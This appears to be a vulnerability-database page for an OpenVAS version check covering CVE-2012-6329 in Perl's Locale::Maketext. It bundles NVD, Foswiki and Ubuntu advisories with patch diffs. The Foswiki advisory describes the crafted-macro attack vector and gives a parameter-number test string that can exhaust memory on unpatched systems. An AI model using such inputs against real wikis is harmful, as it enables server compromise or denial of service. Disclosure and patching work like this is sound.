Search...

Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)

2013-01-24T00:00:00

ID OPENVAS:803339
Type openvas
Reporter Copyright (c) 2013 Greenbone Networks GmbH
Modified 2017-05-05T00:00:00

Description

The host is installed with Active Perl and is prone to multiple code injection vulnerabilities.

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_activeperl_maketext_mult_code_inje_vuln_win.nasl 6074 2017-05-05 09:03:14Z teissa $
#
# Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)
#
# Authors:
# Arun kallavi &lt;karun@secpod.com&gt;
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation will allow attackers to execute arbitrary code on
  the system.
  Impact Level: System/Application";

tag_summary = "The host is installed with Active Perl and is prone to multiple
  code injection vulnerabilities.";
tag_solution = "Upgrade to Active Perl version 5.17.7 or later,
  For updates refer to http://www.perl.org/get.html";
tag_insight = "An improper validation of input by the '_compile()' function which can be
  exploited to inject and execute arbitrary Perl code on the system.";
tag_affected = "Active Perl version prior to 5.17.7 on Windows";

if(description)
{
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  script_id(803339);
  script_version("$Revision: 6074 $");
  script_cve_id("CVE-2012-6329");
  script_bugtraq_id(56852);
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"$Date: 2017-05-05 11:03:14 +0200 (Fri, 05 May 2017) $");
  script_tag(name:"creation_date", value:"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)");
  script_tag(name:"qod_type", value:"registry");
  script_tag(name:"solution_type", value:"VendorFix");
  script_name("Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)");

  script_xref(name : "URL" , value : "http://secunia.com/advisories/51498");
  script_xref(name : "URL" , value : "http://xforce.iss.net/xforce/xfdb/80566");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2013 Greenbone Networks GmbH");
  script_family("General");
  script_dependencies("gb_perl_detect_win.nasl");
  script_mandatory_keys("ActivePerl/Ver");
  exit(0);
}

include("version_func.inc");

## Variable Initialization
apVer = "";

## Get version from KB
apVer = get_kb_item("ActivePerl/Ver");
if(apVer)
{
  if(version_is_less(version:apVer, test_version:"5.17.7"))
  {
    security_message(0);
    exit(0);
  }
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:803339", "type": "openvas", "bulletinFamily": "scanner", "title": "Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)", "description": "The host is installed with Active Perl and is prone to multiple\n code injection vulnerabilities.", "published": "2013-01-24T00:00:00", "modified": "2017-05-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=803339", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "references": ["http://secunia.com/advisories/51498", "http://xforce.iss.net/xforce/xfdb/80566"], "cvelist": ["CVE-2012-6329"], "lastseen": "2017-07-02T21:11:05", "viewCount": 3, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-07-02T21:11:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-6329"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12791", "SECURITYVULNS:VULN:13559", "SECURITYVULNS:DOC:30295", "SECURITYVULNS:DOC:28873", "SECURITYVULNS:DOC:29097", "SECURITYVULNS:VULN:12910"]}, {"type": "f5", "idList": ["SOL15867", "F5:K15867"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310865373", "OPENVAS:1361412562310841704", "OPENVAS:1361412562310803162", "OPENVAS:841704", "OPENVAS:1361412562310803339", "OPENVAS:865373", "OPENVAS:1361412562310865275", "OPENVAS:803162", "OPENVAS:865275", "OPENVAS:1361412562310121275"]}, {"type": "gentoo", "idList": ["GLSA-201410-02"]}, {"type": "ubuntu", "idList": ["USN-2099-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:23580", "EDB-ID:23579"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119055", "PACKETSTORM:118856", "PACKETSTORM:119054"]}, {"type": "nessus", "idList": ["UBUNTU_USN-2099-1.NASL", "AIX_PERL_ADVISORY4.NASL", "FEDORA_2013-1836.NASL", "FOSWIKI_1_1_8.NASL", "TWIKI_5_1_3.NASL", "FEDORA_2013-0659.NASL", "OPENSUSE-2013-225.NASL", "SOLARIS11_PERL-58_20130716.NASL", "GENTOO_GLSA-201410-02.NASL", "FEDORA_2013-0633.NASL"]}, {"type": "aix", "idList": ["PERL_ADVISORY4.ASC"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/FOSWIKI_MAKETEXT", "MSF:EXPLOIT/UNIX/WEBAPP/TWIKI_MAKETEXT"]}, {"type": "seebug", "idList": ["SSV:60534"]}, {"type": "dsquare", "idList": ["E-304"]}, {"type": "fedora", "idList": ["FEDORA:2394F21ABD", "FEDORA:942C320E6D", "FEDORA:8ABCA212D1", "FEDORA:D263821ACF", "FEDORA:8065A20A8B"]}, {"type": "zdt", "idList": ["1337DAY-ID-20407", "1337DAY-ID-20000"]}, {"type": "suse", "idList": ["SUSE-SU-2013:0441-1", "OPENSUSE-SU-2013:0497-1", "SUSE-SU-2013:0442-1", "OPENSUSE-SU-2013:0502-1"]}, {"type": "centos", "idList": ["CESA-2013:0685"]}, {"type": "redhat", "idList": ["RHSA-2013:0746", "RHSA-2013:0685"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0685"]}, {"type": "amazon", "idList": ["ALAS-2013-177"]}], "modified": "2017-07-02T21:11:05", "rev": 2}, "vulnersScore": 7.7}, "pluginID": "803339", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_activeperl_maketext_mult_code_inje_vuln_win.nasl 6074 2017-05-05 09:03:14Z teissa $\n#\n# Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\n#\n# Authors:\n# Arun kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code on\n the system.\n Impact Level: System/Application\";\n\ntag_summary = \"The host is installed with Active Perl and is prone to multiple\n code injection vulnerabilities.\";\ntag_solution = \"Upgrade to Active Perl version 5.17.7 or later,\n For updates refer to http://www.perl.org/get.html\";\ntag_insight = \"An improper validation of input by the '_compile()' function which can be\n exploited to inject and execute arbitrary Perl code on the system.\";\ntag_affected = \"Active Perl version prior to 5.17.7 on Windows\";\n\nif(description)\n{\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_id(803339);\n script_version(\"$Revision: 6074 $\");\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-05 11:03:14 +0200 (Fri, 05 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 12:42:04 +0530 (Thu, 24 Jan 2013)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Active Perl Locale::Maketext Module Multiple Code Injection Vulnerabilities (Windows)\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51498\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/80566\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_perl_detect_win.nasl\");\n script_mandatory_keys(\"ActivePerl/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\napVer = \"\";\n\n## Get version from KB\napVer = get_kb_item(\"ActivePerl/Ver\");\nif(apVer)\n{\n if(version_is_less(version:apVer, test_version:\"5.17.7\"))\n {\n security_message(0);\n exit(0);\n }\n}\n", "naslFamily": "General", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:59:57", "description": "The _compile function in Maketext.pm in the Locale::Maketext implementation in Perl before 5.17.7 does not properly handle backslashes and fully qualified method names during compilation of bracket notation, which allows context-dependent attackers to execute arbitrary commands via crafted input to an application that accepts translation strings from users, as demonstrated by the TWiki application before 5.1.3, and the Foswiki application 1.0.x through 1.0.10 and 1.1.x through 1.1.6.", "edition": 6, "cvss3": {}, "published": "2013-01-04T21:55:00", "title": "CVE-2012-6329", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-6329"], "modified": "2016-12-08T03:02:00", "cpe": ["cpe:/a:perl:perl:5.13.0", "cpe:/a:perl:perl:5.14.1", "cpe:/a:perl:perl:5.12.0", "cpe:/a:perl:perl:5.11.2", "cpe:/a:perl:perl:5.13.5", "cpe:/a:perl:perl:5.12.3", "cpe:/a:perl:perl:5.13.3", "cpe:/a:perl:perl:5.11.1", "cpe:/a:perl:perl:5.16.1", "cpe:/a:perl:perl:5.13.6", "cpe:/a:perl:perl:5.11.4", "cpe:/a:perl:perl:5.13.9", "cpe:/a:perl:perl:5.14.2", "cpe:/a:perl:perl:5.13.4", "cpe:/a:perl:perl:5.13.7", "cpe:/a:perl:perl:5.10.0", "cpe:/a:perl:perl:5.12.1", "cpe:/a:perl:perl:5.13.11", "cpe:/a:perl:perl:5.11.5", "cpe:/a:perl:perl:5.10", "cpe:/a:perl:perl:5.13.1", "cpe:/a:perl:perl:5.16.0", "cpe:/a:perl:perl:5.16.2", "cpe:/a:perl:perl:5.10.1", "cpe:/a:perl:perl:5.12.2", "cpe:/a:perl:perl:5.14.3", "cpe:/a:perl:perl:5.13.8", "cpe:/a:perl:perl:5.11.3", "cpe:/a:perl:perl:5.13.10", "cpe:/a:perl:perl:5.11.0", "cpe:/a:perl:perl:5.13.2", "cpe:/a:perl:perl:5.14.0"], "id": "CVE-2012-6329", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6329", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:perl:perl:5.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.5:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.10:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.8:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.11:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.4:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.7:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.9:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc0:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.10.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.11.5:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.13.6:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:*:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:perl:perl:5.12.3:rc1:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "description": "\r\n\r\n---+ Security Alert: Code injection vulnerability in MAKETEXT macro,\r\nDenial of Service vulnerability in MAKETEXT macro.\r\n\r\nThis advisory alerts you of a potential security issue with your Foswiki\r\ninstallation. A vulnerability has been reported against the core Perl\r\nmodule CPAN:Locale::Maketext, which Foswiki uses to provide translations\r\nwhen {UserInterfaceInternationalization} is enabled in the\r\nconfiguration. Because of this vulnerability it may be possible for a\r\nuser to run arbitrary shell commands and code on the server through a\r\ncrafted %MAKETEXT% macro. If your wiki allows commenting by users\r\nwithout first logging in, then it may be possible for such an anonymous\r\nuser to exploit this vulnerability.\r\n\r\n\r\n---++ Severity Level\r\n\r\nSeverity 1 issue: The web server can be compromised\r\nThe severity level was assigned by the Foswiki\r\nCommunity.SecurityTaskTeam as documented in Development.SecurityAlertProcess\r\n\r\n---++ Vulnerable Software Versions\r\n\r\nAll released versions of Foswiki are vulnerable to these issues\r\n\r\n - Foswiki 1.0.0 - 1.0.10\r\n - Foswiki 1.1.0 - 1.1.6\r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name\r\nCVE-2012-6329 to this vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329\r\nCVE-2012-6330 was assigned to the Denial of Service vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6330\r\n\r\n---++ Attack Vectors\r\n\r\nEditing wiki pages and HTTP POST requests towards a Foswiki server with\r\nenabled localization (typically port 80/TCP). Typically, prior\r\nauthentication is necessary.\r\n\r\nA crafted %MAKETEXT{}% macro will pass through strings to\r\nLocale::Maketext where they are executed under the control of the CGI\r\nuser on the server. Any user with the authority to edit a topic,\r\ncomment on a topic, or execute the Foswiki rendering code (eg. The\r\nRenderPlugin) can take advantage of the vulnerability. (CVE-2012-6329)\r\n\r\nA crafted %MAKETEXT{}% macro will consume large amounts of memory and\r\nexhaust swap space. (CVE-2012-6330)\r\n\r\n---++ Impact\r\n\r\nArbitrary code execution on the server can expose the file system.\r\n\r\nA second less severe Denial of Service vulnerability is also addressed\r\nby this alert.\r\n\r\n---++ Details\r\n\r\nA crafted %MAKETEXT{}% macro can cause multiple issues:\r\n * Execute arbitrary code on the server by passing unsanitized strings\r\nto Locale::Maketext.\r\n * Consume memory and swap space resulting in potential lockup or\r\ncrash due to %<nop>MAKETEXT{}% not validating the parameter numbers\r\nsupplied in the [_nnn] tokens.\r\n * Cause an exception within Foswiki, also due to invalid parameters\r\nin [_nnn] tokens\r\n\r\n\r\n---++ Countermeasures\r\n\r\nOne of the following should be done as soon as possible.\r\n\r\n * Manually Apply hotfix (see patch below). __or__\r\n * Apply the\r\n[[Extensions.PatchItem12285Contrib][http://foswiki.org/Extensions/PatchItem12285Contrib]]\r\nto your Foswiki 1.1.x system (Does not apply to Foswiki 1.0.x) __or__\r\n * Disable {UserInerfaceInternationalization} in your LocalSite.cfg\r\n_(Does not protect against [[SecurityAlert-CVE-2012-6330]])_ __or__\r\n * The foswiki debian package has already been updated with the hotfix\r\n- use your preferred package management tool to update to foswiki 1.1.6-2\r\n\r\nIn addition, CPAN:Locale::Maketext version 1.23 or newer should be\r\ninstalled.\r\n\r\nUpgrade to the latest patched production Download.FoswikiRelease01x01x07\r\nonce released\r\n\r\n*The Foswiki patch fixes other issues with the %MAKETEXT% macro beyond\r\nthe code execution issue. Even if the new Locale::Maketext is installed,\r\nit is strongly recommended to apply the Foswiki patch.*\r\n\r\n\r\n---++ Hotfix for Foswiki Release 1.1.0 - 1.1.6\r\n\r\nInstall http://foswiki.org/Extensions.PatchItem12285Contrib and verify\r\nthat the patch has been applied to lib/Foswiki/Macros/MAKETEXT.pm. The\r\nextension will attempt to apply two patches, and should report that 1\r\nfile was patched. Only one of the patches will match your system. This\r\npatch fixes both CVE-2012-6329 CVE-2012-6330.\r\n\r\n> Running Post-install exit for PatchItem12285Contrib...\r\n> Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-001.patch\r\n> ...\r\n> MD5 Matched - applying patch version Foswiki 1.1.0 - 1.1.2.\r\n> Update successful for /var/www/data/Foswiki-1.1.0/lib/Foswiki/Macros/MAKETEXT.pm\r\n> .\r\n> 1 file patched\r\n> ...\r\n> Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-002.patch\r\n> ...\r\n> No files matched patch signatures\r\n\r\n\r\nOn a properly patched system, %MAKETEXT{" [_101] "}% should return an\r\nerror.\r\n> Excessive parameter number 101, MAKETEXT rejected. \r\n\r\nNote that this Contrib will also install the\r\nExtensions.PatchFoswikiContrib as a prerequisite. PatchFoswikiContrib\r\npatches the Extensions installer to accept the new style version strings\r\nused for modules released as of 1.1.6.\r\n\r\n---++ Hotfix for Foswiki Archived Release 1.0.0-1.0.10\r\n\r\nThis patch fixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]].\r\n\r\nThis release should be manually patched.\r\n\r\nIn Foswiki.pm, in the sub MAKETEXT\r\n\r\n============ vvv CUT vvv =============\r\n--- Foswiki.pm 2010-01-17 09:16:20.000000000 -0500\r\n+++ Foswiki.pm 2012-12-10 10:06:37.389129654 -0500\r\n@@ -4200,6 +4200,9 @@\r\n $str =~\r\n s/~\[(\*,\_(\d+),[^,]+(,([^,]+))?)~\]/ $max = $2 if ($2 > $max); "[$1]"/ge;\r\n+ return "Illegal parameter number" if ($max > 100);\r\n+ $str =~ s#\\#\\\\#g;\r\n+\r\n # get the args to be interpolated.\r\n my $argsStr = $params->{args} || "";\r\n\r\n============ ---CUT--- =============\r\n\r\n\r\n---++ Manual patch for Foswiki Release 1.1.0 -> 1.1.6\r\n\r\nInstalling the Extensions.PatchItem12285Contrib is the best way to patch\r\nyour system - you can however see the patch we apply here. This patch\r\nfixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]]:\r\n\r\n============ vvv CUT vvv =============\r\n--- lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:51:12.959268829 -0500\r\n+++ lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:37:31.674486503 -0500\r\n @@ -4,9 +4,19 @@\r\n use strict;\r\n use warnings;\r\n+use Locale::Maketext;\r\n+my $escape =\r\n+ ( $Foswiki::cfg{UserInterfaceInternationalisation}\r\n+ && $Locale::Maketext::VERSION\r\n+ && $Locale::Maketext::VERSION < 1.23 );\r\n+\r\n sub MAKETEXT {\r\n my ( $this, $params ) = @_;\r\n+ my $max;\r\n+ my $min;\r\n+ my $param_error;\r\n+\r\n my $str = $params->{_DEFAULT} || $params->{string} || "";\r\n return "" unless $str;\r\n @@ -18,15 +28,22 @@\r\n $str =~ s/~~\[/~[/g;\r\n $str =~ s/~~\]/~]/g;\r\n+ $max = 0;\r\n+ $min = 1;\r\n+ $param_error = 0;\r\n+\r\n # unescape parameters and calculate highest parameter number:\r\n- my $max = 0;\r\n- $str =~ s/~\[(\_(\d+))~\]/ $max = $2 if ($2 > $max); "[$1]"/ge;\r\n+ $str =~ s/~\[(\_(\d+))~\]/_validate($1, $2, $max, $min,\r\n$param_error)/ge;\r\n $str =~\r\n-s/~\[(\*,\_(\d+),[^,]+(,([^,]+))?)~\]/ $max = $2 if ($2 > $max); "[$1]"/ge;\r\n+s/~\[(\*,\_(\d+),[^,]+(,([^,]+))?)~\]/ _validate($1, $2, $max, $min,\r\n$param_error)/ge;\r\n+ return $str if ($param_error);\r\n # get the args to be interpolated.\r\n my $argsStr = $params->{args} || "";\r\n+ # Escape any escapes.\r\n+ $str =~ s#\\#\\\\#g if ($escape); # escape any escapes\r\n+\r\n my @args = split( /\s*,\s*/, $argsStr );\r\n # fill omitted args with empty strings\r\n@@ -47,6 +64,26 @@\r\n return $result;\r\n }\r\n+sub _validate {\r\n+\r\n+ #my ( $contents, $number, $max, $min, $param_error ) = @_\r\n+\r\n+ $_[2] = $_[1] if ( $_[1] > $_[2] ); # Record maximum param number\r\n+ $_[3] = $_[1] if ( $_[1] < $_[3] ); # Record minimum param number\r\n+\r\n+ if ( $_[1] > 100 ) {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+"Excessive parameter number $_[2],\r\nMAKETEXT rejected.";\r\n+ }\r\n+ if ( $_[1] < 1 ) {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+"Invalid parameter <code>\"$_[0]\"</code>,\r\nMAKETEXT rejected.";\r\n+ }\r\n+ return "[$_[0]]"; # Return the complete bracket parameter\r\nwithout escapes\r\n+}\r\n+\r\n 1;\r\n __END__\r\n Foswiki - The Free and Open Source Wiki, http://foswiki.org/\r\n\r\n============ ^^^ CUT ^^^ =============\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2012-12-05 - The Locale::Maketext vulnerability was discussed on\r\nthe Perl5Porters email list, triggered review of Foswiki code.\r\n * 2012-12-05 - Patched version (1.23) of Locale::Maketext is released.\r\n * 2012-12-08 - The [_999999] DoS issue identified and sent to foswiki\r\nsecurity list.\r\n * 2012-12-09 - The "remote execution" vulnerability in\r\nLocale::Maketext was confirmed on Foswiki.\r\n * 2012-12-09 - Requested the CVE from cve-assign@mitre.org.\r\n * 2012-12-09 - TWiki notified of the Vulnerability.\r\n * 2012-12-10 - Developer fixes code (George Clark) and security team\r\nvalidates the fixes.\r\n * 2012-12-10 - Extensions.PatchItem12285Contrib released for Foswiki\r\n1.1.x\r\n * 2012-12-10 - Security team creates advisory with hotfix.\r\nAnnouncement delayed for coordination with TWiki (George Clark)\r\n * 2012-12-12 - Updated Debian packages released (Sven Dowideit)\r\n * 2012-12-12 - Send alert to foswiki-announce and foswiki-discuss\r\nmailing lists ( )\r\n * 2012-12-14 - Publish advisory in Support web and update all related\r\ntopics ( )\r\n * 2012-12-14 - Reference to public advisory on Download page and\r\nKnown Issues ( )\r\n * 2012-xx-xx - Release Manager builds patch release ( )\r\n * 2012-xx-xx - Issue a public security advisory (vuln@secunia.com,\r\ncert@cert.org, bugs@securitytracker.com,\r\nfull-disclosure@lists.netsys.com, vulnwatch@vulnwatch.org) ( )\r\n", "edition": 1, "modified": "2012-12-18T00:00:00", "published": "2012-12-18T00:00:00", "id": "SECURITYVULNS:DOC:28873", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28873", "title": "Foswiki Security Alert CVE-2012-6329, CVE-2012-6330 Remote code execution and other vulnerabilities in MAKETEXT macro", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "cvelist": ["CVE-2012-6329"], "description": "It's possible to call external functions on template compilation", "edition": 1, "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "SECURITYVULNS:VULN:13559", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13559", "title": "perl Locale::Maketext code execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "cvelist": ["CVE-2012-6329"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2099-1\r\nFebruary 05, 2014\r\n\r\nperl vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nPerl could be made to run programs if it processed a specially crafted\r\nLocale::Maketext templates.\r\n\r\nSoftware Description:\r\n- perl: Practical Extraction and Report Language\r\n\r\nDetails:\r\n\r\nIt was discovered that Perl's Locale::Maketext module incorrectly handled\r\nbackslashes and fully qualified method names. An attacker could possibly\r\nuse this flaw to execute arbitrary code when an application used untrusted\r\ntemplates.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n perl-modules 5.14.2-13ubuntu0.3\r\n\r\nUbuntu 12.04 LTS:\r\n perl-modules 5.14.2-6ubuntu2.4\r\n\r\nUbuntu 10.04 LTS:\r\n perl-modules 5.10.1-8ubuntu2.4\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2099-1\r\n CVE-2012-6329\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-13ubuntu0.3\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-6ubuntu2.4\r\n https://launchpad.net/ubuntu/+source/perl/5.10.1-8ubuntu2.4\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2014-02-10T00:00:00", "published": "2014-02-10T00:00:00", "id": "SECURITYVULNS:DOC:30295", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30295", "title": "[USN-2099-1] Perl vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:47", 